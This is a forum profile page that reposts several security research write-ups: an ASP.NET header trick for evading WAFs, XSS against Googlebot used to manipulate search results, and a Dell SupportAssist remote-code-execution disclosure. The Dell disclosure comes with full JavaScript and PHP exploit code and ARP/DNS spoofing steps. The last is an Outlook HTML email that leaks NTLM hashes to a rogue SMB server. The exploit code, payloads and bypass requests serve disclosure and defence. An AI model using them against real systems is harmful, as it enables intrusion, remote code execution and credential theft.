-
Posts
18772 -
Joined
-
Last visited
-
Days Won
730
Everything posted by Nytro
-
x-up-devcap-post-charset Header in ASP.NET to Bypass WAFs Again! Leave a Reply In the past, I showed how the request encoding technique can be abused to bypass web application firewalls (WAFs). The generic WAF solution to stop this technique has been implemented by only allowing whitelisted charset via the Content-Type header or by blocking certain encoding charsets. Although WAF protection mechanisms can normally be bypassed by changing the headers slightly, I have also found a new header in ASP.NET that can hold the charset value which should bypass any existing protection mechanism using the Content-Type header. Let me introduce to you, the one and only, the x-up-devcap-post-charset header that can be used like this: POST /test/a.aspx?%C8%85%93%93%96%E6%96%99%93%84= HTTP/1.1 Host: target User-Agent: UP foobar Content-Type: application/x-www-form-urlencoded x-up-devcap-post-charset: ibm500 Content-Length: 40 %89%95%97%A4%A3%F1=%A7%A7%A7%A7%A7%A7%A7 As it is shown above, the Content-Type header does not have the charset directive and the x-up-devcap-post-charset header holds the encoding’s charset instead. In order to tell ASP.NET to use this new header, the User-Agent header should start with UP! The parameters in the above request were create by the Burp Suite HTTP Smuggler, and this request is equal to: POST /testme87/a.aspx?HelloWorld= HTTP/1.1 Host: target User-Agent: UP foobar Content-Type: application/x-www-form-urlencoded Content-Length: 14 input1=xxxxxxx I found this header whilst I was looking for something else inside the ASP.NET Framework. Here is how ASP.NET reads the content encoding before it looks at the charset directive in the Content-Type header: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362 if (UserAgent!=null && CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) { string postDataCharset = Headers["x-up-devcap-post-charset"]; if (postDataCharset!=null && postDataCharset.Length>0) { try { return Encoding.GetEncoding(postDataCharset); Or https://github.com/Microsoft/referencesource/blob/08b84d13e81cfdbd769a557b368539aac6a9cb30/System.Web/HttpRequest.cs#L905 if (UserAgent != null && CultureInfo.InvariantCulture.CompareInfo.IsPrefix(UserAgent, "UP")) { String postDataCharset = Headers["x-up-devcap-post-charset"]; if (!String.IsNullOrEmpty(postDataCharset)) { try { return Encoding.GetEncoding(postDataCharset); I should admit that the original technique still works on most of the WAFs out there as they have not taken the request encoding bypass technique seriously However, the OWASP ModSecurity Core Rule Set (CRS) quickly created a simple rule for it at the time which they are going to improve in the future. Therefore, I disclosed this new header to Christian Folini (@ChrFolini) from CRS to create another useful rule before releasing this blog post. The pull request for the new rule is pending at https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1392. References: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/request-encoding-to-bypass-web-application-firewalls/ https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour https://soroush.secproject.com/blog/2018/08/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour/ https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/ https://github.com/nccgroup/BurpSuiteHTTPSmuggler/ This entry was posted in Security Articles and tagged ASP.NET, request encoding, waf, WAF bypass, x-up-devcap-post-charset on May 4, 2019. Sursa: https://soroush.secproject.com/blog/2019/05/x-up-devcap-post-charset-header-in-aspnet-to-bypass-wafs-again/
-
XSS attacks on Googlebot allow search index manipulation Short version: Googlebot is based on Google Chrome version 41 (2015), and therefore it has no XSS Auditor, which later versions of Chrome use to protect the user from XSS attacks. Many sites are susceptible to XSS Attacks, where the URL can be manipulated to inject unsanitized Javascript code into the site. Since Googlebot executes Javascript, this allows an attacker to craft XSS URLs that can manipulate the content of victim sites. This manipulation can include injecting links, which Googlebot will follow to crawl the destination site. This presumably manipulates PageRank, but I’ve not tested that for fear of impacting real sites rankings. I reported this to Google in November 2018, but after 5 months they had made no headway on the issue (citing internal communication difficulties), and therefore I’m publishing details such that site owners and companies can defend their own sites from this sort of attack. Google have now told me they do not have immediate plans to remedy this. Last year I published details of an attack against Google’s handling of XML Sitemaps, which allowed an attacker to ‘borrow’ PageRank from other sites and rank illegitimate sites for competitive terms in Google’s search results. Following that, I had been investigating other potential attack when my colleague at Distilled, Robin Lord, mentioned the concept of Javascript injection attacks which got me thinking. XSS Attacks There are various types of cross-site scripting (XSS) attack; we are interested in the situation where Javascript code inside the URL is included inside the content of the page without being sanitized. This can result in the Javascript code being executed in the user’s browser (even though the code isn’t intended to be part of the site). For example, imagine this snippet of PHP code which is designed to show the value of the page URL parameter: If someone was to craft a malicious URL where instead of a number in the page parameter they instead put a snippet of Javascript: https://foo.com/stores/?page=<script>alert('hello')</script> Then it may produce some HTML with inline Javascript, which the page authors had never intended to be there: That malicious Javascript could do all sorts of evil things, such as steal data from the victim page, or trick the user into thinking the content they are looking at is authentic. The user may be visiting a trusted domain, and therefore trust the contents of the page, which are being manipulated by a hacker. Chrome to the rescue It is for that reason that Google Chrome has an XSS Auditor, which attempts to identify this type of attack and protect the user (by refusing to load the page): So far, so good. Googlebot = Chrome 41 Googlebot is currently based on Chrome version 41, which we know from Google’s own documentation. We also know that for the last couple of years Google have been promoting the fact that Googlebot executes and indexes Javascript on the sites it crawls. Chrome 41 had no XSS Auditor (that I’m aware of, it certainly doesn’t block any XSS that I’ve tried), and therefore my theory was that Googlebot likely has no XSS Auditor. So the first step was to check, whether Googlebot (or Google’s Website Rendering Service [WRS], to be more precise) would actually render a URL with an XSS attack. One of my early tests was on the startup bank, Revolut — a 3 year old fintech startup with $330M in funding having XSS vulnerabilities demonstrates the breadth of the XSS issue (they’ve now fixed this example). I used Google’s Mobile Friendly Tool to render the page, which quickly confirms Google’s WRS executes the XSS Javascript, in this case I’m crudely injecting a link at the top of the page: It is often (as in the case with Revolut) possible to entirely replace the content of the page to create your own page and content, hosted on the victim domain. Content + links are cached I submitted a test page to the Google index, and then examining the cache of these pages shows that the link being added to the page does appear in the Google index: Canonicals A second set of experiments demonstrated (again via the mobile friendly tool) that you can change the canonicals on pages: Which I also confirmed via Google’s URL Inspector Tool, which reports the injected canonical as the true canonical (h/t to Sam Nemzer for the suggestion): Links are crawled and considered At this point, I had confirmed that Google’s WRS is susceptible to XSS attacks, and that Google were crawling the pages, executing the Javascript, indexing the content and considering the search directives within (i.e. the canonicals). The next important stage, is does Google find links on these pages and crawl them. Placing links on other sites is the backbone of the PageRank algorithm and a key factor for how sites rank in Google’s algorithm. To test this, I crafted a page on Revolut which contained a link to a page on one of my test domains which I had just created moments before, and had previously not existed. I submitted the Revolut page to Google and later on Googlebot crawled the target page on my test domain. The page later appeared in the Google search results: This demonstrated that Google was identifying and crawling injected links. Furthermore, Google confirms that Javascript links are treated identically to HTML links (thanks Joel Mesherghi? All of this demonstrates that there is potential to manipulate the Google search results. However, I was unsure how to test this without actually impacting legitimate search results, so I stopped where I was (I asked Google for permission to do this in a controlled fashion a few days back, but not had an answer just yet). How could this be abused? The obvious attack vector here is to inject links into other websites to manipulate the search results – a few links from prominent sites can make a very dramatic difference to search performance. The https://www.openbugbounty.org/ lists more than 125,000 un-patched XSS vulnerabilities. This included 260 .gov domains, 971 .edu domains, and 195 of the top 500 domains (as ranked by the Majestic Million top million sites. A second attack vector is to create malicious pages (maybe redirecting people to a malicious checkout, or directing visitors to a competing product) which would be crawled and indexed by Google. This content could even drive featured snippets and appear directly in the search results. Firefox doesn’t yet have adequate XSS protection, so this pages would load for Google users searching with Firefox. Defence The most obvious way to defend against this is to take security seriously and try to ensure you don’t have XSS vulnerabilities on your site. However, given then numbers from OpenBugBounty above, it is clear that that is more difficult that it sounds – which is the exact reason that Google added the XSS Auditor to Chrome! One quick thing you can do is check your server logs and search for URLs that have terms such as ‘script’ in them, indicating a possible XSS attempt. Wrap up This exploit is a combination of existing issues, but combine to form an zero-day exploit that has potential to be very harmful for Google users. I reported the issue to Google back on November 2018, but they have not confirmed the issue from their side or made any headway addressing it. They cited “difficulties in communication with the team investigating”, which felt a lot like what happened during the report of XML Sitemaps exploit. My impression is that if a security issue affects a not commonly affected part of Google, then the internal lines of communication are not well oiled. It was March when I got the first details, when Google let me know “that our existing protection mechanisms should be able to prevent this type of abuse but the team is still running checks to validate this” – which didn’t agree with the evidence. I re-ran some of my tests and didn’t see a difference. The security team themselves were very responsive, as usual, but seemingly had no way to move things forward unfortunately. It was 140 days after the report when I let Google know I’d be publicly disclosing the vulnerability, given the lack of movement and the fact that this could already be impacting both Google search users, as well as website owners and advertisers. To their credit, Google didn’t attempt to dissuade me and asked me to simply to use my best judgement in what I publish. If you have any questions, comments or information you can find me on Twitter at @TomAnthonySEO, or if you are interested in consulting for technical/specialised SEO, you can contact me via Distilled. Disclosure Timeline 3rd November 2018 – I filed the initial bug report. Over the next few weeks/months we went back and forth a bit. 11th February 2019 – Google responded letting me know they were “surfacing some difficulties in communication with the team investigating” 17th April 2018 – Google confirmed they have no immediate plans to fix this. I believe this is probably because they are preparing to release a new build of Googlebot shortly (I wonder if this was why the back and forth was slow – they were hoping to release the update?) Sursa: http://www.tomanthony.co.uk/blog/xss-attacks-googlebot-index-manipulation/
-
This talk will give you an in-depth look into the different areas within the IT world on how different encoding schemes can lead to implementation flaws or even security vulnerabilities. Check out Christopher's slides here: http://dreher.in/pub/unicode/#/ Have a question? Ask it on our forum: http://bgcd.co/2uq2Aql Join Bugcrowd today: http://bgcd.co/2up2fUH
-
Remote Code Execution on most Dell computers What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is “What third-party software came with my PC?”. In this article, I’ll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to “proactively check the health of your system’s hardware and software” and which is “preinstalled on most of all new Dell devices”. Discovery Back in September, I was in the market for a new laptop because my 7-year-old Macbook Pro just wasn’t cutting it anymore. I was looking for an affordable laptop that had the performance I needed and I decided on Dell’s G3 15 laptop. I decided to upgrade my laptop’s 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell’s support site, I was prompted with an interesting option. “Detect PC”? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened. A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn’t installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website. Installing it was a painless process with just a click to install button. In the shadows, the SupportAssist Installer created the SupportAssistAgent and the Dell Hardware Support service. These services corresponded to .NET binaries making it easy to reverse engineer what it did. After installing, I went back to the Dell website and decided to check what it could find. I opened the Chrome Web Inspector and the Network tab then pressed the “Detect Drivers” button. The website made requests to port 8884 on my local computer. Checking that port out on Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing is exposing a REST API of sorts in their service which would allow communication from the Dell website to do various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests. On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken which also provides when the signature expires. After pressing download drivers on the web side, this request was of particular interest: POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json Origin: https://www.dell.com Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 The body: [ { "title":"Dell G3 3579 and 3779 System BIOS", "category":"BIOS", "name":"G3_3579_1.9.0.exe", "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe", "isSecure":false, "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66", "run":false, "restricted":false, "fileId":"198393521", "fileSize":"13 MB", "checkedStatus":false, "fileStatus":-99, "driverId":"4WW45", "path":"", "dupInstallReturnCode":"", "cssClass":"inactive-step", "isReboot":true, "DiableInstallNow":true, "$$hashKey":"object:175" } ] It seemed like the web client could make direct requests to the SupportAssistAgent service to “download and manually install” a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued. On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest. ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE. An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell: // Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0 public static bool ValidateDomain(Uri request, Uri urlReferrer) { return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) &&request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http"); } // Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124 public static bool ValidateDomain(string domain) { return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com"); } The issue with the function above is the fact that it really isn’t a solid check and gives an attacker a lot to work with. To bypass the Referer/Origin check, we have a few options: Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to find one on the sites designated for SupportAssist) Find a Subdomain Takeover vulnerability Make the request from a local program Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server. In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS. When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browsers console. At first, the website tries to detect SupportAssist by looping through the aformentioned service ports and connecting to the Service Method “isalive”. What was interesting was that it was passing a “Signature” parameter and a “Expires” parameter. To find out more, I reversed the javascript side of the browser. Here’s what I found out: First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem. Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE]. The SupportAssist client then responds when the right service port is reached, with a style like this: { "isAlive": true, "clientVersion": "[CLIENT VERSION]", "requiredVersion": null, "success": true, "data": null, "localTime": [EPOCH TIME], "Exception": { "Code": null, "Message": null, "Type": null } } Once the browser sees this, it continues with further requests using the now determined service port. Some concerning factors I noticed while looking at different types of requests I could make is that I could get a very detailed description of every piece of hardware connected to my computer using the “getsysteminfo” route. Even through Cross Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find some sensitive information. Here are the methods the agent exposes: clientservice_getdevicedrivers - Grabs available updates. diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support). downloadservice_downloadfiles - Downloads a JSON array of files. clientservice_isalive - Used as a heartbeat and returns basic information about the agent. clientservice_getservicetag - Grabs the service tag. localclient_img - Connects to SignalR (Dell Hardware Support). diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information. clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally. diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system. downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them. diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending. diagnosticsservice_launchtool - Launches a diagnostic tool. diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action. downloadservice_createiso - Download an ISO. clientservice_checkadminrights - Check if the Agent privileged. diagnosticsservice_performinstallation - Update SupportAssist. diagnosticsservice_rebootsystem - Reboot system. clientservice_getdevices - Grab system devices. downloadservice_dlmcommand - Check on the status of or cancel an ongoing download. diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support). downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall. downloadservice_createbootableiso - Download bootable iso. diagnosticsservice_isalive - Heartbeat check. downloadservice_downloadandautoinstall - Downloads a list of files and executes them. clientservice_getscanresults - Gets driver scan results. downloadservice_restartsystem - Restarts the system. The one that caught my interest was downloadservice_downloadandautoinstall. This method would download a file from a specified URL and then run it. This method is ran by the browser when the user needs to install certain drivers that need to be installed automatically. After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”. The browser sends a request with the following JSON structure: [ { "title":"DOWNLOAD TITLE", "category":"CATEGORY", "name":"FILENAME", "location":"FILE URL", "isSecure":false, "fileUniqueId":"RANDOMUUID", "run":true, "installOrder":2, "restricted":false, "fileStatus":-99, "driverId":"DRIVER ID", "dupInstallReturnCode":0, "cssClass":"inactive-step", "isReboot":false, "scanPNPId":"PNP ID", "$$hashKey":"object:210" } ] After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost. ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method: if (service_Method == "downloadservice_downloadandautoinstall") { string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty; result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false); } Which calls DownloadServiceLogic.DownloadAutoInstall and provides the files we sent in the JSON payload. DownloadServiceLogic.DownloadAutoInstall acts as a wrapper (i.e handling exceptions) for DownloadServiceLogic._HandleJson. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks: foreach (File file in list) { bool flag2 = file.Location.ToLower().StartsWith("http://"); if (flag2) { file.Location = file.Location.Replace("http://", "https://"); } bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location); if (flag3) { DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method"); throw new InvalidFileException(); } } DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list); The above code loops through every file, and checks if the file URL we provided doesn’t start with http:// (if it does, replace it with https://), and checks if the URL matches a list of Dell’s download servers (not all subdomains): public static bool CheckDomain(string fileLocation) { List<string> list = new List<string> { "ftp.dell.com", "downloads.dell.com", "ausgesd4f1.aus.amer.dell.com" }; return list.Contains(new Uri(fileLocation.ToLower()).Host); } Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest at which point the SupportAssist downloads and runs the files as Administrator. This is enough information we need to start writing an exploit. Exploitation The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain, we’ll get into how exactly we do this further in this section. I decided to mimic the browser and make requests using javascript. First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”. This isn’t as straight-forwards as it might seem. The “Access-Control-Allow-Origin” of the signature url is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not https. How do we get past this barrier? We make the request from our own servers! The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures: <?php header('Access-Control-Allow-Origin: *'); echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken'); ?> The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object. Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded: function FindServer() { ports.forEach(function(port) { var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken; var response = SendAsyncRequest(is_alive_url, function(){server_port = port;}); }); } After we have found the server, we can send our payload. This was the hardest part, we have some serious obstacles before “downloadandautoinstall” executes our payload. Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host must be either “ftp.dell.com”, “downloads.dell.com”, or “ausgesd4f1.aus.amer.dell.com”. I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me, we can do a man-in-the-middle attack. If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge. The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key bypass to this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. See, the thing was, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn’t replace it. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you ran the string through the starts with check, it would return false, because the string starts with “ “, thus leaving the “http://” alone. I made a function that automated sending the payload: function SendRCEPayload() { var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken; var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", auto_install_url, true); var files = []; files.push({ "title": "SupportAssist RCE", "category": "Serial ATA", "name": "calc.EXE", "location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY "isSecure": false, "fileUniqueId": guid(), "run": true, "installOrder": 2, "restricted": false, "fileStatus": -99, "driverId": "FXGNY", "dupInstallReturnCode": 0, "cssClass": "inactive-step", "isReboot": false, "scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10", "$$hashKey": "object:210"}); xmlhttp.send(JSON.stringify(files)); } Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker’s machine): Grab the interface IP address for the specified interface. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier. To ARP Spoof the victim, we first enable ip forwarding then send an ARP packet to the victim telling it that we’re the router and an ARP packet to the router telling it that we’re the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router. Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL. When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload. You can read Dell’s advisory here. Demo Here’s a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here. The source code of the dellrce.html file featured in the video is: <h1>CVE-2019-3719</h1> <h1>Nothing suspicious here... move along...</h1> <iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe> Timeline 10/26/2018 - Initial write up sent to Dell. 10/29/2018 - Initial response from Dell. 11/22/2018 - Dell has confirmed the vulnerability. 11/29/2018 - Dell scheduled a “tentative” fix to be released in Q1 2019. 01/28/2019 - Disclosure date extended to March. 03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April. 04/18/2019 - Vulnerability disclosed as an advisory. Written on April 30, 2019 Sursa: https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/
-
Love letters from the red team: from e-mail to NTLM hashes with Microsoft Outlook ntlm, security, red team — 03 July 2018 Introduction A few months ago Will Dormann of CERT/CC published a blog post [1] describing a technique where an adversary could abuse Microsoft Outlook together with OLE objects, a feature of Microsoft Windows since its early days, to force the operating system to leak Net-NTLM hashes. Last year we wrote a blog post [2] that touched the subject of NTLM hash leakage via a different angle, by abusing common web application vulnerabilities such as Cross-Site Scripting (XSS) and Server-Side Request Forgery (SSRF) to achieve the same goals and obtain the precious hashes we all love and cherish. We recommend reading the post we published previously before continuing unless you are familiar with how Windows single sign-on authenticates itself in corporate networks. Here in Blaze Information Security we have been using for a while, with a high success rate, a similar technique to force MS Outlook to give out NTLM hashes with little to no interaction other than reading a specially-crafted e-mail message. Just recently, while we were writing this blog post, NCC Group published [5] in their blog an article describing the same technique we have been using along with other details, so we decided to publish ours explaining the approach we use and how to mitigate the risk presented by this issue. A brief history of SMB-to-NTLM hashes attacks In a post to Bugtraq mailing list in March 1997 (yes, 21 years ago) Aaron Spangler wrote about a vulnerability [3] in versions of Internet Explorer and Netscape Navigator that worked by embedding an tag with the 'src' value of an SMB share instead of a HTTP or HTTPS page. This would force Windows to initiate an NTLM authentication with a modified SMB server that could fetch the user's Net-NTLM hashes. Interestingly, Aaron's Bugtraq post also hinted about a theoretical flaw in the authentication protocol what would become later known as SMBRelay attacks but they emerged only a few years later. Fast forward to 2016, a Russian security researcher named ValdikSS wrote [6] on Medium what seems to have been a modern replica of the same experiment Spangler did 19 years ago, with little to no modification from the original attack vector. Abusing Microsoft Outlook to steal Net-NTLM hashes Rather than using the CERT/CC technique - taking advantage of the possibility to embed OLE objects inside a RTF, DOC or PDF, which may make security software integrated with the e-mail server to raise their eye brows, this technique exploits Outlook's handling of HTML messages with images and the behavior described in the Bugtraq post of 1997. HTML e-mails with embedded images are very popular, especially in corporate environments, and are less likely to be screened or blocked by anti-virus software and e-mail gateways. The Net-NTLM hashes will be leaked via SMB traffic to an external rogue SMB server, like Responder (our tool of choice for the demo), Core Security's Impacket smbrelay or ntlmrelay or even a custom SMB server. In a nutshell, the attack works by sending an e-mail to victim in HTML format, with an image pointing to an external SMB server. The image can be, for example, a HTML-based e-mail signature. The client will automatically initiate a NTLM authentication against the rogue server, ultimately leaking its hashes. From a victim's perspective in some cases depending on how Outlook is configured to render images in HTML e-mails, there may be an alert about opening external content and this may hint an abnormal behavior. Nevertheless, this is a common occurrence for many Outlook users to have to click through a warning to render an image, so this does not pose a strong obstacle for this exploitation vector. Sometimes we have also noticed a very quick pop-up before fetching content from the remote SMB server in slower connections, also a regular occurrence that is unlikely to raise suspicion. Frequently Outlook is configured to render images automatically when the sender is trusted - common trust relationships are when the sender is internal to the organization. For instance, sending an HTML e-mail with an tag pointing to a rogue SMB server from malicious-adversary@blazeinfosec.com to victim@blazeinfosec.com, will make the Outlook client of victim@blazeinfosec.com render the e-mail automatically and leak NTLM hashes. This can be useful in a scenario where a penetration tester or red teamer has compromised a single e-mail account in the target organization and will use it to compromise other users individually or en masse by sending the bobby-trapped e-mail to a distribution list. Even though in some situations this technique is not as silent as the one described by Will Dormann, it has proved to be very effective in many of our engagements and should be in your attack toolbox. It is worth remembering Net-NTLM hashes cannot be used in Pass-the-Hash attacks, unlike pure NTLM hashes, they can be relayed (under some circumstances) [9] or cracked using off-the-shelf tools like hashcat. Exploitation steps Even though all it takes to exploit the issue is the ability to send an HTML e-mail, meaning it is possible to use any e-mail client or even a script to automate this attack, in this section we will describe how to achieve this using Microsoft Outlook itself. 1) Create a HTML file with the following content: <html> <img src="file:///10.30.1.23/test">Test NTLM leak via Outlook </html> The IP address above is for illustration only and was used in our labs. It can be any IP or hostname, including remote addresses. 2) Create an e-mail message to the target. Add the HTML payload as an attachment but using the option "Insert as Text" so it will create the e-mail message as HTML. 3) The victim opens the e-mail without any further interaction: 4) The target's Net-NTLM hashes were automatically captured by our Responder: An important requirement for this exploit to work is obviously the ability of the target to connect to the attacker's SMB server on port 445. Some ISPs block this port by default, while many others do not. Interestingly enough, Microsoft maintains a small list [7] of ISPs that do not filter outbound access to port 445. Preventing the issue Once again, the problem described in this post is a design decision from Windows and for over 20 years it is known that it can be abused in a myriad of scenarios. There are a couple different ways to reduce the impact brought by this insecure behavior. Setting to 2 the value of the registry key RestrictSendingNTLMTraffic in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV10 will reduce the exposure of this risk, as Windows will no longer send the NTLMv1 or NTLMv2 hashes when challenged by a server, whether it is legitimate or rogue. However, it is likely to break functionality and single sign-on mechanisms, especially in corporate networks that heavily rely on NTLM authentication. Back in 2017 without much advertisement Microsoft also released a mitigation [4] for Windows 10 and Windows Server 2016 that prevents NTLM SSO authentication with resources that are not marked as internal by the Windows Firewall, denying NTLM SSO authentication for public resources, ultimately limiting the exposure of Net-NTLM hashes when challenged by external services like an attacker-operated SMB server. This feature is not activated by default and a user has to opt-in by explicitly applying changes to the registry. From a network security perspective, the adverse effect of this weakness can be mitigated by defining firewall rules that disallow SMB connections to reach non-whitelisted external servers, or even better blocking all external SMB connections altogether if this can be considered an option. Conclusion There are security risks related to NTLM authentication that are frequently overlooked, despite they have been known for over two decades now. Exploiting these issues are trivial and poses a serious risk to an organization, especially from an insider threat point of view or a compromised account scenario. Preventing this issue is not trivial but may be helped with some of the latest Microsoft patches and other carefully thought strategies to restrict NTLM traffic. Maybe one day Microsoft will release a patch or a service pack that will prevent Windows from leaking NTLM hashes all over the place. References [1] 